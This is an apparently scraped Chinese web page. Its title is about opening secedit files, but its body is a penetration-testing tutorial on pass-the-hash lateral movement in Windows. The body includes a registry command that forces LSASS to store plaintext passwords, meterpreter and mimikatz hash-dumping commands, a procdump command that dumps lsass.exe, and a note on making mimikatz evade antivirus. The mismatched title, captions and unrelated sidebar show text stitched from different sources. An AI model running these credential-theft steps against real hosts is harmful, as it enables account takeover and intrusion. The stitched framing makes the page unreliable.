当前位置:首页 > 经验 >

不能打开secedit文件(sec文件格式怎么打开)

来源:原点资讯(www.yd166.com)时间:2022-11-04 00:33:53作者:YD166手机阅读>>

学习网络安全的小伙伴可以私信问我拿奇安信老师最新的课件资料笔记 大厂面试课题~

不能打开secedit文件,sec文件格式怎么打开(1)

网络安全课件资料 笔记 面试课题无偿赠送

横向移动PTH

如果找到了某个用户的NTLM hash,就可以拿这个ntlm hash当作凭证进行远程登陆了
其中若hash加密方式是 rc4 ,那么就是pass the hash
若加密方式是aes key,那么就是pass the key
注意NTLM和kerberos协议均存在PTH:
NTLM自然不用多说
kerberos协议也是基于用户的client hash开始一步步认证的,自然也会受PTH影响

那前提就是要获取hash值了

KB2871997

如果系统安装KB2871997补丁或者系统版本大于等于window server 2012时(服务器版本),大于等于win8.1(家庭版本)时(自带补丁),默认在LSASS.exe这个进程中不会再将可逆的密文缓存在自己的进程内存中,所以我们默认是没办法通过读取这个进程然后逆向该密文来获取明文密码

虽然可以通过修改注册表来使LSASS强制存储明文密码

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

但是这种方式要求系统重启或者用户重新登录,在实战中操作起来成功率还是比较低的。

同时比较重要的一点是增加了Protected Users组,所属用户会被强制要求使用Kerberos认证,可以避免PTH攻击,以及用户注销后删除凭证(明文密码、LM/NTLM HASH、Kerberos的TGT票据等)

以及:Restricted Admin RDP模式的远程桌面客户端支持

关于KB2871997的一个误解

自window Vista之后没办法使用RID非500的本地管理员用户来进行Pass The Hash, 但是如果是域用户且该域用户属于本地Administrators组的成员也可以进行pass the hash。

很多人把这个原因归结于KB2871997补丁,实际上不然,这个事情的成因实际是UAC在捣乱。UAC是window Vista的新安全组件,具体是个啥这里也不细说了。
RID为500的账户和属于本地administrators组的域用户在通过网络远程链接时,默认就是高权限令牌。
而非RID500的本地账户则为低权限令牌,若想提升权限则需通过交互方式登录到要通过远程协助或远程桌面管理的计算机走UAC提权。

关于这个成因的一些系统配置选项:

不能打开secedit文件,sec文件格式怎么打开(2)

这个项默认允许内置管理员账户(RID500账户)在所有应用下都以高权限令牌运行。这也是RID500账户能PTH的原因

以及此注册表项,可以关闭UAC的远程限制,即远程连接时UAC会失效,这样的话只要是administrators组的用户都能PTH辣。

不能打开secedit文件,sec文件格式怎么打开(3)

其中该值为0则代表开启UAC的远程限制,设置该值为1时

HASH获取
  1. 使用meterpreter里的mimikatz模块

meterpreter>load mimikatz meterpreter>mimikatz_command -f mimikatz的指令 privilege::debug 提权 samdump::hashes dump哈希 或者 meterpreter>msv/kerberos/widgst

2.使用meterpreter自带的hash获取模块

meterpreter>hashdump meterpreter>run windows/gather/smart_hashdump (推荐使用这个)

3.向目标机上传mimikatz远程调用mimikatz.exe dump出hash,mimikatz需要免*处理
意思就是既然我们获取到了shell,我们直接向目标机上传一个mimikatz然后在shell里使用它就行了. 使用方法为cmd窗口打开mimikatz.exe,进入mimikatz终端,然后输入mimikatz指令即可

4.上传procdump到目标机,获取到lsass.dmp文件后将其传回本地又mimikatz来dump哈希

procdump.exe是微软自带的程序,所以不会触发*毒。所以可以通过它传回lsass.dmp本地提取hash

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 执行该指令,获取到lsass.dmp 然后将其传回本地 通过mimikatz.exe分别执行以下命令 "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

不能打开secedit文件,sec文件格式怎么打开(4)

栏目热文

chm乱码解决办法(chm转txt 乱码)

chm乱码解决办法(chm转txt 乱码)

1、问题在项目开发过程中,遇到需要将页面上选择的文件上传至FTP服务器,遇到一些坑,比如上传文件中文名乱码,上传时指定上...

2022-11-04 00:58:00查看全文 >>

金融市场开放的原因(金融市场开放现状)

金融市场开放的原因(金融市场开放现状)

金融开放 积极推进减税、进一步扩大开放金融市场,这是中国今年以来最具影响力的重要举措。 其中,积极推进减税措施,有利于降...

2022-11-04 00:31:03查看全文 >>

全面开放金融市场对哪些行业影响(中国金融市场全面开放的商机)

全面开放金融市场对哪些行业影响(中国金融市场全面开放的商机)

每经记者:张寿林 每经编辑:廖丹党的十八大以来,我国金融业发展取得举世瞩目的成就,银行业保险业实现新的跨越式发展。202...

2022-11-04 01:11:35查看全文 >>

开放金融到底有多重要(金融开放对中国来说存在的机会)

开放金融到底有多重要(金融开放对中国来说存在的机会)

《中国经济周刊》 记者 谢玮|北京报道在高水平对外开放中,金融业开放是重要的组成部分。回望过去10年,我国金融业对外开放...

2022-11-04 00:49:07查看全文 >>

金融市场开放的利弊(金融市场全面开放的影响)

金融市场开放的利弊(金融市场全面开放的影响)

金融开放是新时代最大的制度红利,也是我国高质量发展取得新成就的重要法宝。对于中国金融开放政策的努力和成绩,各界有目共睹,...

2022-11-04 00:57:22查看全文 >>

sec文件用什么方式打开(如何下载sec上的文件)

sec文件用什么方式打开(如何下载sec上的文件)

导读:本文是对上一篇文章的延续,在阅读本文之前建议先快速阅读一下《InnoDB Page结构详解》创建表结构,插入三条数...

2022-11-04 00:56:37查看全文 >>

chm编辑教程(chm编辑器中文版)

chm编辑教程(chm编辑器中文版)

作为一名编程人员,在学习各种编程语言时,会经常翻阅官方的chm帮助手册学习,那么你是否也想制作一个自己的帮助文档呢?下面...

2022-11-04 00:35:56查看全文 >>

chm格式的缺点(chm格式图解)

chm格式的缺点(chm格式图解)

你在寻找新的电子书阅读软件吗?来看看这四款适用于安卓的可靠的开源电子书阅读器吧。• 来源:linux.cn • 作者:S...

2022-11-04 01:14:15查看全文 >>

chm怎么编辑文件(技术资料用chm编辑器整理)

chm怎么编辑文件(技术资料用chm编辑器整理)

(本‬文‬作‬于‬2013年‬并‬发‬表‬在‬其‬它‬平台,因‬时‬间太久‬个‬别‬配‬图‬已‬不‬能加‬载‬)对于经...

2022-11-04 01:05:59查看全文 >>

secedit打不开文件(editplus文件太大打不开)

secedit打不开文件(editplus文件太大打不开)

第一部分背景360互联网安全中心监测到一种利用被入侵服务器进行门罗币挖矿的僵尸网络,该僵尸网络控制的服务器数量高峰时单日...

2022-11-04 00:34:46查看全文 >>

文档排行